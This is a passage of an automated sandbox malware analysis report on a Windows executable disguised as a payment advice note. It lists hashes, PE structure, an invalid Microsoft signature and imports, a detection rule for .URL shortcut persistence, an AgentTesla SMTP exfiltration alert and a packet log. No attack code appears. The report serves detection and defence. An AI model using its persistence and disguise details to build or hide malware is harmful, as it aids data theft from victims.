                                                                                                                                                • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\pdwO.url, Author: @itsreallynick (Nick Carr)
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Owdpdrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.062405677677901
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                File name:USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                                                                                                                File size:1346928
                                                                                                                                                MD5:5d3d23738b2b4bb1f7fe3371ea7ecc76
                                                                                                                                                SHA1:4e72608c340c7b18f4ff359552da57c9dee29e99
                                                                                                                                                SHA256:21b054a3b319b950887eff329ebb237a5d442e6742e94d66d2ff17cd85f8d930
                                                                                                                                                SHA512:0d62a76ebd28ff69c4d9201f01e39e1b1737e521635afc37fd10eb04007f9538b7e8c2cd5a8a5697fab2e2768bd22062dfa0002ea4fceb4aebec7b4eba76ba2a
                                                                                                                                                SSDEEP:24576:aVggyMBuni3KmeVXHY7hiBrGNLYragKkTZxUScffBxsqPerMmzZC3N4Sr5RPEwdO:a5uWVLYLnURxsqPerMmzZC3N4Sr5RPEO
                                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:64ccd4f0f0f0f8d4

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x4a6a0c
                                                                                                                                                Entrypoint Section:.itext
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:9f8c170f32c73b28f480a91184443651

                                                                                                                                                Authenticode Signature

                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                Error Number:-2146869232
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 12/7/2009 11:40:29 PM 3/7/2011 11:40:29 PM
                                                                                                                                                Subject Chain
                                                                                                                                                • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:E3FEDB37F4874E84CDB82A789FFDCD67
                                                                                                                                                Thumbprint SHA-1:9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
                                                                                                                                                Thumbprint SHA-256:277D42066A68326BA10B1874D393327404287C14A9C9DB1C09D50698952A17DD
                                                                                                                                                Serial:6101CF3E00000000000F

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                                push ebx
                                                                                                                                                mov eax, 004A5140h
                                                                                                                                                call 00007F05244B64C8h
                                                                                                                                                mov ebx, dword ptr [004AA5D0h]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                call 00007F052451A31Bh
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, 004A6A88h
                                                                                                                                                call 00007F0524519D8Fh
                                                                                                                                                mov ecx, dword ptr [004AA458h]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [004A42C8h]
                                                                                                                                                call 00007F052451A314h
                                                                                                                                                mov ecx, dword ptr [004AA2D8h]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [004A2E90h]
                                                                                                                                                call 00007F052451A301h
                                                                                                                                                mov eax, dword ptr [004AA458h]
                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                xor edx, edx
                                                                                                                                                call 00007F05245124EBh
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov byte ptr [eax+5Bh], 00000000h
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                call 00007F052451A366h
                                                                                                                                                pop ebx
                                                                                                                                                call 00007F05244B400Ch
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add bh, bh

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xaf0000x2d46.idata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xbf0000x91000.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1476000x1770.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xa714.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xb30000x18.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xaf8800x704.idata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000xa44500xa4600False0.520161002852data6.55423520994IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                .itext0xa60000xa940xc00False0.5556640625data5.87975501075IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0xa70000x37b00x3800False0.3994140625data4.61945402788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .bss0xab0000x3b380x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .idata0xaf0000x2d460x2e00False0.316576086957data5.15484719413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .tls0xb20000x400x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0xb30000x180x200False0.05078125data0.210826267787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0xb40000xa7140xa800False0.548107328869data6.63320143782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0xbf0000x910000x91000False0.531827518858data7.0918777236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                RT_CURSOR0xbfcb80x134dataEnglishUnited States
                                                                                                                                                RT_CURSOR0xbfdec0x134dataEnglishUnited States
                                                                                                                                                RT_CURSOR0xbff200x134dataEnglishUnited States
                                                                                                                                                RT_CURSOR0xc00540x134dataEnglishUnited States
                                                                                                                                                RT_CURSOR0xc01880x134dataEnglishUnited States
                                                                                                                                                RT_CURSOR0xc02bc0x134dataEnglishUnited States
                                                                                                                                                RT_CURSOR0xc03f00x134dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc05240x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc06f40x1e4dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc08d80x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc0aa80x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc0c780x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc0e480x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc10180x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc11e80x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc13b80x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc15880x1d0dataEnglishUnited States
                                                                                                                                                RT_BITMAP0xc17580xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                RT_ICON0xc18400x10a8dataEnglishUnited States
                                                                                                                                                RT_ICON0xc28e80x25a8dataEnglishUnited States
                                                                                                                                                RT_ICON0xc4e900x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 49407, next used block 4294909696EnglishUnited States
                                                                                                                                                RT_ICON0xc90b80x5488dataEnglishUnited States
                                                                                                                                                RT_ICON0xce5400xa2a8dataEnglishUnited States
                                                                                                                                                RT_DIALOG0xd87e80x52data
                                                                                                                                                RT_DIALOG0xd883c0x52data
                                                                                                                                                RT_STRING0xd88900x174data
                                                                                                                                                RT_STRING0xd8a040x3ecdata
                                                                                                                                                RT_STRING0xd8df00x520data
                                                                                                                                                RT_STRING0xd93100x224data
                                                                                                                                                RT_STRING0xd95340xc8data
                                                                                                                                                RT_STRING0xd95fc0x10cdata
                                                                                                                                                RT_STRING0xd97080x2ccdata
                                                                                                                                                RT_STRING0xd99d40x3f0data
                                                                                                                                                RT_STRING0xd9dc40x390data
                                                                                                                                                RT_STRING0xda1540x370data
                                                                                                                                                RT_STRING0xda4c40x390data
                                                                                                                                                RT_STRING0xda8540xd0data
                                                                                                                                                RT_STRING0xda9240xa0data
                                                                                                                                                RT_STRING0xda9c40x2b8data
                                                                                                                                                RT_STRING0xdac7c0x474data
                                                                                                                                                RT_STRING0xdb0f00x38cdata
                                                                                                                                                RT_STRING0xdb47c0x2b4data
                                                                                                                                                RT_RCDATA0xdb7300x10data
                                                                                                                                                RT_RCDATA0xdb7400x434data
                                                                                                                                                RT_RCDATA0xdbb740x6b9Delphi compiled form 'T__2325477761'
                                                                                                                                                RT_RCDATA0xdc2300x861Delphi compiled form 'T__2325686981'
                                                                                                                                                RT_RCDATA0xdca940x72fceGIF image data, version 89a, 808 x 236EnglishUnited States
                                                                                                                                                RT_GROUP_CURSOR0x14fa640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                RT_GROUP_CURSOR0x14fa780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                RT_GROUP_CURSOR0x14fa8c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                RT_GROUP_CURSOR0x14faa00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                RT_GROUP_CURSOR0x14fab40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                RT_GROUP_CURSOR0x14fac80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                RT_GROUP_CURSOR0x14fadc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                RT_GROUP_ICON0x14faf00x4cdataEnglishUnited States
                                                                                                                                                RT_MANIFEST0x14fb3c0x336XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, NotifyWinEvent, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetROP2, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CreateDirectoryA, CompareStringA, CloseHandle
                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                                oleaut32.dllGetErrorInfo, GetActiveObject, VariantInit, SysFreeString
                                                                                                                                                ole32.dllCoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                kernel32.dllSleep
                                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                wininet.dllInternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                                                oleacc.dllLresultFromObject
                                                                                                                                                winmm.dllsndPlaySoundA

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                11/20/20-11:28:40.241774TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49769587192.168.2.4192.186.237.168

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 20, 2020 11:26:39.232889891 CET49733443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:26:39.249454975 CET44349733162.159.138.232192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.249602079 CET49733443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:26:39.250047922 CET49733443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:26:39.266573906 CET44349733162.159.138.232192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.266729116 CET49733443192.168.2.4162.159.138.232
                                                                                                                                                Nov 20, 2020 11:26:39.351433039 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.367850065 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.367970943 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.384814024 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.401174068 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.402167082 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.402210951 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.402235985 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.402282953 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.402342081 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.554016113 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.570513010 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.570945024 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.571019888 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.587100029 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.603673935 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628701925 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628735065 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628773928 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628796101 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628830910 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628860950 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628901005 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628911972 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.628928900 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628963947 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.628979921 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.628999949 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629026890 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629060030 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629095078 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629097939 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629112959 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629143000 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629170895 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629193068 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629208088 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629239082 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629260063 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629277945 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629313946 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629333019 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629349947 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629386902 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629407883 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629457951 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629462957 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629494905 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629520893 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629538059 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629580021 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629592896 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629623890 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629657984 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629669905 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629699945 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629740000 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629741907 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629784107 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629795074 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629827023 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629863024 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629868031 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629909992 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629940987 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629952908 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.629992962 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.629995108 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.630037069 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.630078077 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.630079985 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.630120993 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.630161047 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.630162001 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.630198956 CET44349734162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:26:39.630239010 CET49734443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:26:39.630239964 CET44349734162.159.135.233192.168.2.4
